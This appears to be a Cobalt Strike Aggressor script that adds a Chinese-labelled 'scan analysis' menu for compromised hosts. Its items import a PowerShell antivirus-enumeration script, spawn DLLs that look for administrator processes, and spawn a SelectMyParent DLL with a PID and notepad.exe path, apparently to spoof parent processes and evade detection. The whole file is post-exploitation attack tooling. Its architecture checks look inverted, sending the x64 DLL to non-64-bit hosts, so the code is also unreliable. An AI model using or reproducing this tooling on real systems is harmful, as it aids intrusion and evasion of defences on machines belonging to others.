
menu "扫描分析"{
    item "杀毒检测"{
        foreach $id ($1){
            bpowershell_import!($id, script_resource("bin/check_av.ps1"));
            bpowerpick!($1, "avquery");
        }
    }
    item "检测管理员进程"{
        if(-is64 $1)
        {
            bdllspawn($1, script_resource("bin/Processauthority.dll"), $null, "test dll", 5000, false);
        } else {
            bdllspawn($1, script_resource("bin/Processauthority.x64.dll"), $null, "test dll", 5000, false);
        }

    }
    item "test"{
        if(-is64 $1)
        {
            bdllspawn($1, script_resource("bin/SelectMyParent.dll"), "a and", "test dll", 5000, false);
        } else {
            bdllspawn($1, script_resource("bin/SelectMyParent.x64.dll"), "21588 c:\\windows\\notepad.exe", "test dll", 5000, false);
        }
    }
}